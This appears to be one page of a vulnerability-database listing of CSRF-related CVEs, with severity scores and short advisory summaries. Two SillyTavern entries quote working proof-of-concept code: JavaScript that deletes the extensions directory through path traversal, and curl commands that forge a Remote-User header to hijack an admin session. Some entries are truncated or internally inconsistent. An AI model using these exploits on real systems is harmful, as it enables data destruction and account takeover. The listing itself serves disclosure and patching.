NVD VulDB
EPSS 0% CVSS 8.1
HIGH This Week

Authenticated attackers with Contributor-level access can delete entire multi-currency configurations in FOX Currency Switcher Professional for WooCommerce by visiting any wp-admin page with a specific parameter, and the lack of nonce verification allows CSRF-based exploitation against administrators. Confirmed actively exploited (CISA KEV). CVSS 8.1 reflects high integrity and availability impact, with EPSS data unavailable. WordPress plugin affects versions ≤1.4.5, with patch released in version 1.4.6 per Wordfence advisory. The dual attack vectors (direct authenticated abuse and CSRF) significantly increase real-world risk for WooCommerce installations using this currency management plugin.

Authentication Bypass CSRF WordPress
NVD VulDB
EPSS 0% CVSS 8.5
HIGH This Week

Cross-site request forgery in Musetheque V4 Information Disclosure for IPKNOWLEDGE V4L1 rev2203.0 and earlier enables remote attackers to execute unauthorized operations through victim's authenticated session via malicious web pages. Successful exploitation achieves high confidentiality and integrity impact without requiring attacker authentication. Reported by JPCERT to JVN, indicating likely targeting of Japanese enterprise deployments. No active exploitation (CISA KEV) or public POC identified at time of analysis.

Information Disclosure CSRF Musetheque V4 Information Disclosure For Ipknowledge
NVD
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Stored cross-site scripting (XSS) in pyLoad's download management interface allows authenticated users with add-package permissions to inject JavaScript that executes in administrators' browsers when viewing the /collector or /queue pages. The vulnerability stems from unescaped template literal interpolation in packages.js that directly writes attacker-controlled link URLs to the DOM via jQuery .html(). Exploitation requires low-privilege authentication (Perms.ADD role) but enables full session hijacking against administrators, leading to plugin upload, configuration tampering, and potential remote code execution through reconnect-script features. A secondary unauthenticated attack vector exists when the ClickNLoad handler is enabled via POST /flash/add. No public exploit identified at time of analysis, though detailed proof-of-concept is published in the GitHub advisory.

XSS CSRF
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM PATCH This Month

Cross-Site Request Forgery via image URL manipulation in Open WebUI allows authenticated users to perform unauthorized actions on behalf of victims by embedding malicious image URLs in profile pictures, model images, shared chats, and notes. When any user (including admins) views these compromised images, their browser sends GET requests to attacker-controlled servers, enabling cookie theft, denial of service, or execution of sensitive operations. Publicly available proof-of-concept code demonstrates exploitation across multiple attack vectors. The vulnerability affects all versions up to and including v0.9.2, with a vendor-released patch available in v0.9.3.

Denial Of Service Information Disclosure CSRF
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in the LatePoint WordPress booking plugin (all versions ≤ 5.3.2) allows unauthenticated attackers to cancel a logged-in customer's appointments without consent by delivering a forged HTTP request. The root cause is missing nonce verification in the request_cancellation() function within the customer cabinet controller. EPSS is negligible at 0.02% (7th percentile), SSVC classifies exploitation as none, and no public exploit code or active exploitation has been identified at time of analysis.

CSRF WordPress Latepoint Calendar Booking Plugin For Appointments And Events
NVD
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Cross-Site Request Forgery in GitLab CE/EE allows an unauthenticated attacker to create unauthorized Jira subscriptions within a targeted authenticated user's namespace by tricking the victim into clicking a specially crafted link. All GitLab installations from version 11.10 through the pre-patch 18.x releases are affected across both Community and Enterprise editions. No public exploit exists and this is not listed in CISA KEV; however, the broad version range spanning over seven years of releases and the prevalence of Jira integrations in enterprise GitLab deployments make patching a meaningful priority.

CSRF Atlassian Gitlab
NVD VulDB
EPSS 0% CVSS 5.1
MEDIUM POC This Month

Easy2Pilot 7 contains a cross-site request forgery vulnerability that allows attackers to add unauthorized user accounts by tricking authenticated administrators into visiting malicious pages. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

PHP CSRF
NVD Exploit-DB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Cross-site request forgery (CSRF) in F5 BIG-IP Configuration utility dashboard allows unauthenticated remote attackers to perform unauthorized actions (integrity and availability impact) against authenticated users through malicious web pages, requiring user interaction to click a crafted link. Patch is available from F5. No public exploit code or active exploitation confirmed at time of analysis.

CSRF Big Ip
NVD VulDB
EPSS 0% CVSS 5.1
MEDIUM This Month

Cross-site request forgery (CSRF) in ELECOM wireless LAN access points (WAB-BE187-M, WAB-BE72-M, WAB-BE36-M, WAB-BE36-S) allows remote attackers to trick authenticated users into performing unintended administrative operations by viewing a malicious webpage. The vulnerability exists despite CSRF token implementation due to inadequate token validation, enabling integrity compromise of access point configuration without user knowledge.

CSRF Wab Be187 M Wab Be72 M +2
NVD
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Unauthenticated open redirect in Authlib's OpenIDImplicitGrant and OpenIDHybridGrant authorization endpoints allows remote attackers to redirect users to attacker-controlled URLs by submitting authorization requests that omit the openid scope. The vulnerability occurs because scope validation happens before redirect_uri validation, allowing the error handler to return an HTTP 302 with an unvalidated attacker-supplied redirect_uri. A proof-of-concept GET request demonstrates the flaw trivially; no authentication, valid client_id, or user interaction beyond clicking the link is required, though the CVSS score of 6.1 reflects the requirement for user interaction (UI:R) to click the phishing link. Actively exploited in the wild (KEV status), this is a Medium-severity open redirect enabling credential harvesting attacks.

Python CSRF Open Redirect
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL Act Now

Cross-site WebSocket hijacking in Garmin WDU v1 1.4.6 and v2 5.0 allows remote attackers to gain full administrative control of the marine network device. Exploitation requires the victim to browse a malicious website while connected to both the Garmin Marine Network and another network simultaneously. EPSS score of 0.02% (5th percentile) indicates low probability of widespread exploitation, but CVSS 9.3 reflects severe potential impact when conditions are met - this is a high-impact, low-probability threat primarily relevant to maritime environments with dual-network configurations.

CSRF
NVD VulDB
EPSS 0% CVSS 5.8
MEDIUM This Month

Warpgate is an open source SSH, HTTPS and MySQL bastion host for Linux. Prior to 0.23.3, the SSO flow does not validate the state parameter, which makes it possible for an attacker to trick a user into logging into the attacker's account, possibly convincing them to perform sensitive actions on the attacker's account (such as writing sensitive data to the attacker's SSH target, or logging into an HTTP target that the attacker set up). This vulnerability is fixed in 0.23.3.

Information Disclosure CSRF Warpgate
NVD GitHub
EPSS 0% CVSS 8.1
HIGH This Week

ChurchCRM is an open-source church management system. Prior to 7.3.2, top-level cross-site GET navigation from an attacker-controlled page to FundRaiserDelete.php, PropertyTypeDelete.php, or NoteDelete.php causes a logged-in ChurchCRM user with the relevant role to silently delete records, including cascaded property and record-to-property assignments. This vulnerability is fixed in 7.3.2.

PHP CSRF
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

{ return response.status(400).send('Bad Request'); } // [2] sanitize(".") → "" const extensionPath = path.join(basePath, sanitize(extensionName)); // path.join("data\\default-user\\extensions", "") // = "data\\default-user\\extensions" ← basePath itself! // [3] Deletes the entire extensions directory await fs.promises.rm(extensionPath, { recursive: true }); ``` `sanitize-filename` converts `"."` to `""` (documented behavior). `path.join(basePath, "")` returns `basePath` itself. Result: the entire `data\default-user\extensions\` directory is deleted. Tested on: Windows 10, SillyTavern v1.17.0, commit `004f1336e` Authentication: none (basicAuthMode: false, default configuration) Run in browser console (F12) while SillyTavern is open: ```javascript async function poc() { const { token } = await (await fetch('/csrf-token')).json(); const headers = { 'Content-Type': 'application/json', 'X-CSRF-Token': token, }; // Before: 1 extension installed const before = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('Before:', before.filter(e => e.type === 'local')); // [{ type: 'local', name: 'third-party/Extension-Notebook' }] // Attack const res = await fetch('/api/extensions/delete', { method: 'POST', headers, body: JSON.stringify({ extensionName: '.' }), }); console.log('Status:', res.status); // 200 console.log('Body:', await res.text()); // "Extension has been deleted at data\default-user\extensions" // After: empty const after = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('After:', after.filter(e => e.type === 'local')); // [] } poc(); ``` **Result:** Before: [{ type: 'local', name: 'third-party/Extension-Notebook' }] Status: 200 Body: Extension has been deleted at data\default-user\extensions After: [] - **No authentication required** (`basicAuthMode: false` by default). Any user with network access to the SillyTavern instance can permanently delete the entire extensions directory with a single HTTP request. - All installed third-party extensions are unrecoverably lost. - With `global: true` and admin privileges, the global extensions directory shared across all users can also be deleted. - This vulnerability can be chained with CVE-2025-59159 (DNS rebinding) to enable unauthenticated remote exploitation from a malicious website. The same vulnerability exists in: - `POST /api/extensions/update` - `POST /api/extensions/version` - `POST /api/extensions/branches` - `POST /api/extensions/switch` ```javascript const sanitized = sanitize(extensionName); // Check AFTER sanitizing if (!sanitized) { return response.status(400).send('Bad Request: Invalid extension name.'); } const extensionPath = path.join(basePath, sanitized); // Additional path traversal guard const resolvedPath = path.resolve(extensionPath); const resolvedBase = path.resolve(basePath); if (!resolvedPath.startsWith(resolvedBase + path.sep)) { return response.status(400).send('Bad Request: Invalid extension path.'); } ``` Apply the same fix to `/update`, `/version`, `/branches`, and `/switch` endpoints. - CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H (9.1 Critical) - sanitize-filename npm: https://www.npmjs.com/package/sanitize-filename - Related CVE (same project): CVE-2025-59159 ##REPORTED BY Jormungandr

Microsoft Node.js CSRF +1
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

{ if (!request.session) { return false; } const remoteUser = request.get(header); // reads any header from any client if (!remoteUser) { return false; } const userHandles = await getAllUserHandles(); for (const userHandle of userHandles) { if (remoteUser.toLowerCase() === userHandle) { const user = await storage.getItem(toKey(userHandle)); if (user && user.enabled) { request.session.handle = userHandle; return true; } } } return false; } ``` `request.get(header)` is Express's wrapper for `req.headers[name.toLowerCase()]`. Express does not distinguish between headers set by a trusted upstream proxy and headers injected by the end client. Without an IP allowlist check, any client can set `Remote-User: ` and receive an authenticated session cookie. The `/api/users/list` endpoint is registered before `requireLoginMiddleware` in `src/server-main.js:236`, making it publicly accessible without authentication: `src/server-main.js:236,239`: ```js app.use('/api/users', usersPublicRouter); // line 236 (public) app.use(requireLoginMiddleware); // line 239 (auth gate) ``` `src/endpoints/users-public.js:26-57`: ```js router.post('/list', async (_request, response) => { if (DISCREET_LOGIN) { return response.sendStatus(204); } const users = await storage.values(x => x.key.startsWith(KEY_PREFIX)); return response.json(viewModels); // returns handle, name, avatar, admin, password flags }); ``` This allows an attacker to enumerate all user handles (including admin handles) without any prior credentials. ```bash TARGET="http://localhost:8000" curl -s -X POST "$TARGET/api/users/list" -H "Content-Type: application/json" -d '{}' curl -s -L \ -H "Remote-User: admin-user" \ -c /tmp/st-session.txt \ "$TARGET/login" TOKEN=$(curl -s -b /tmp/st-session.txt "$TARGET/csrf-token" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") curl -s -X POST "$TARGET/api/users/admin/get" \ -H "Content-Type: application/json" \ -H "X-CSRF-Token: $TOKEN" \ -b /tmp/st-session.txt \ -d '{}' ``` --- An account takeover, allowing an attacker to do anything a legitimately authorized user can do.

Authentication Bypass CSRF
NVD GitHub
EPSS 0% CVSS 8.8
HIGH This Week

ChurchCRM is an open-source church management system. Prior to 7.3.2, UserEditor.php processes user account creation and permission updates entirely through $_POST parameters with no CSRF token validation. An unauthenticated attacker can craft a malicious HTML page that, when visited by an authenticated administrator, silently elevates any low-privilege user to full administrator or creates a new admin backdoor account without the victim's knowledge This vulnerability is fixed in 7.3.2.

Privilege Escalation PHP CSRF
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

OpenClaude MCP's OAuth callback handler in Node.js can be shut down via CSRF attack by sending a request with any `error` query parameter, bypassing state validation entirely without knowledge of the CSRF token. The vulnerability allows unauthenticated remote attackers to terminate a user's active authentication session and force server shutdown due to a logic flaw where the `error` parameter check precedes and disables the state validation check. Vendor-released patch version 0.5.1 available.

Denial Of Service Node.js CSRF
NVD GitHub
EPSS 0% CVSS 7.1
HIGH This Week

Cross-Site Request Forgery in Pandora FMS versions 777 through 800 enables attackers to execute unauthorized administrative actions through victim interaction with malicious web pages. The network-accessible attack requires no authentication but depends on user interaction (CVSS AV:N/PR:N/UI:P), allowing high integrity impact (VI:H) with limited confidentiality exposure (VC:L). No active exploitation confirmed (CISA KEV not listed), EPSS data not available for assessment. Vendor Pandora FMS has acknowledged the vulnerability with public disclosure.

CSRF Pandora Fms
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery (CSRF) in the Skysa Text Ticker App plugin for WordPress affects all versions up to 1.4, allowing unauthenticated attackers to modify plugin settings including scrolling message text and URLs by tricking site administrators into clicking a malicious link. The vulnerability stems from missing nonce validation in the SkysaApps_Admin_AppPage function, enabling attackers to alter ticker content without authentication but requiring user interaction via social engineering.

CSRF WordPress
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in WooCommerce Minimum Weight plugin for WordPress up to version 3.0.1 allows unauthenticated attackers to modify minimum order weight settings by tricking site administrators into clicking malicious links or visiting attacker-controlled pages. The vulnerability stems from missing nonce verification in the settings update handler, enabling forged POST requests to alter critical e-commerce configuration without admin consent. No public exploit code or active exploitation has been identified at time of analysis.

PHP CSRF WordPress
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in the Zawgyi Embed WordPress plugin versions up to 2.1.1 allows unauthenticated attackers to modify the plugin's zawgyi_forceCSS setting by tricking a site administrator into clicking a malicious link. The vulnerability stems from missing nonce validation in the zawgyi_adminpage function, enabling attackers to submit forged POST requests to the plugin's settings page without the administrator's knowledge.

PHP CSRF WordPress
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-Site Request Forgery (CSRF) in Tm - WordPress Redirection plugin for WordPress versions up to 1.2 allows unauthenticated attackers to update plugin settings and inject malicious web scripts by tricking a site administrator into clicking a malicious link. The vulnerability stems from missing or incorrect nonce validation on sensitive functions, enabling attackers to forge requests that execute administrative actions without the admin's explicit consent. CVSS score is 6.1 with network attack vector and low complexity, though exploitation requires user interaction (tricking administrator). No public exploit code or active exploitation has been identified at the time of analysis.

CSRF WordPress
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in WP-Redirection plugin for WordPress versions up to 1.0.3 allows unauthenticated attackers to trick logged-in administrators into modifying redirection rules by clicking a crafted link, enabling unauthorized creation, modification, or deletion of URL redirects without consent. The vulnerability stems from missing nonce validation in the admin settings form handler, affecting all installations running vulnerable versions.

CSRF WordPress
NVD
EPSS 0% CVSS 7.1
HIGH PATCH This Week

CSRF vulnerability in Backdrop CMS Salesforce module versions prior to 1.x-1.0.1 allows network attackers to hijack OAuth authorization flows. By exploiting the missing random state parameter in the OAuth implementation, attackers can trick authenticated users into authorizing malicious Salesforce integrations, leading to high confidentiality and integrity impact on integrated Salesforce data. CVSS 7.1 (High) reflects network vector with high attack complexity requiring user interaction. No CISA KEV listing or public exploit identified at time of analysis, with EPSS data unavailable for comprehensive risk scoring.

CSRF Backdrop Contrib Salesforce
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Cross-site request forgery (CSRF) in SAP BusinessObjects Business Intelligence Platform allows unauthenticated attackers to trick authenticated users into sending unintended requests to the web server, resulting in low-impact modifications to application integrity and availability. The vulnerability requires user interaction (clicking a malicious link) and affects all versions of the platform due to insufficient CSRF token validation. No confidentiality impact is present, limiting the attack surface to state-changing operations.

CSRF SAP
NVD VulDB
EPSS 0% CVSS 5.8
MEDIUM PATCH This Month

Outline is a service that allows for collaborative documentation. Prior to 1.7.1, the Slack integration callback for GET /auth/slack.post accepts an unsigned, session-independent OAuth state value. A third party who can obtain a Slack OAuth code for the same Outline Slack client can make a logged-in Outline user complete the callback and link that user's Outline account to the attacker's Slack team_id and user_id. The linked Slack identity can then use the Slack /outline search command as the victim Outline user. This vulnerability is fixed in 1.7.1.

CSRF Outline
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Using *show_inline=1* parameter and a valid *file_show_inline_token* CSRF token on file_download.php, an attacker can execute code by uploading a crafted XHTML attachment referencing a JavaScript attachment. Cross-site scripting - 26647b2e68ba30b9d7987d4e03d7a16416684bc2 None Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.

XSS PHP CSRF
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH This Week

Cross-Site Request Forgery (CSRF) in HireFlow v1.2 allows remote attackers to perform unauthorized actions on behalf of authenticated users without token validation on any state-changing endpoint. An attacker can craft malicious web pages to silently change victim passwords, delete candidate records, inject feedback, or schedule interviews when visited by an authenticated user. The absence of SESSION_COOKIE_SAMESITE configuration removes browser-level CSRF defenses. Publicly available exploit code exists (SSVC exploitation status: POC), though EPSS score of 0.02% (4th percentile) suggests limited widespread targeting. CVSS 8.1 reflects high confidentiality and integrity impact requiring only user interaction (UI:R), making this a realistic threat in phishing scenarios despite no active exploitation confirmed at time of analysis.

CSRF N A
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM POC This Month

OpenCart 3.0.3.7 contains a cross-site request forgery vulnerability that allows attackers to change user passwords by sending crafted requests to the account/password endpoint. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

CSRF Opencart
NVD Exploit-DB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

OpenCart 3.0.36 contains a cross-site request forgery vulnerability in the /account/edit endpoint that allows unauthenticated attackers to modify victim account details by tricking users into. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

CSRF Authentication Bypass Opencart
NVD Exploit-DB
EPSS 0% CVSS 5.3
MEDIUM POC This Month

WordPress Plugin Curtain 1.0.2 contains a cross-site request forgery vulnerability that allows attackers to activate or deactivate site maintenance mode by crafting malicious requests. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

WordPress PHP CSRF
NVD Exploit-DB
EPSS 0% CVSS 2.1
LOW POC PATCH Monitor

Cross-site request forgery in osTicket up to version 1.18.3 allows remote attackers to bypass CSRF token validation by manipulating the _method parameter via GET requests, enabling unauthorized state-changing operations without user interaction beyond clicking a malicious link. The vulnerability exploits improper HTTP method emulation in the Dispatcher component and has publicly available proof-of-concept code; a vendor patch is available.

PHP CSRF
NVD VulDB GitHub
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Emlog is an open source website building system. Prior to version 2.6.11, missing CSRF protection in critical admin functions allows attackers to trick authenticated administrators into performing unauthorized actions like system registration, plugin management, and configuration changes. This issue has been patched in version 2.6.11.

CSRF
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Same-site Cross-Site Request Forgery (CSRF) in RedwoodSDK server actions allows attackers controlling same-site origins to invoke arbitrary server actions with victim session cookies in versions 1.0.0-beta.50 through 1.2.2. The vulnerability stems from missing origin validation despite HTTP method enforcement, enabling attackers to trigger state-changing operations through subdomain takeover, sibling-application XSS, or local development vectors. Vendor-released patch version 1.2.3 enforces Origin/Host matching validation. CVSS 5.3 reflects high integrity impact (UI:R) but constrained attack complexity (AC:H) and no information disclosure.

CSRF Sdk
NVD GitHub
Prev Page 4 of 94 Next

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
8442

Related CWEs

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy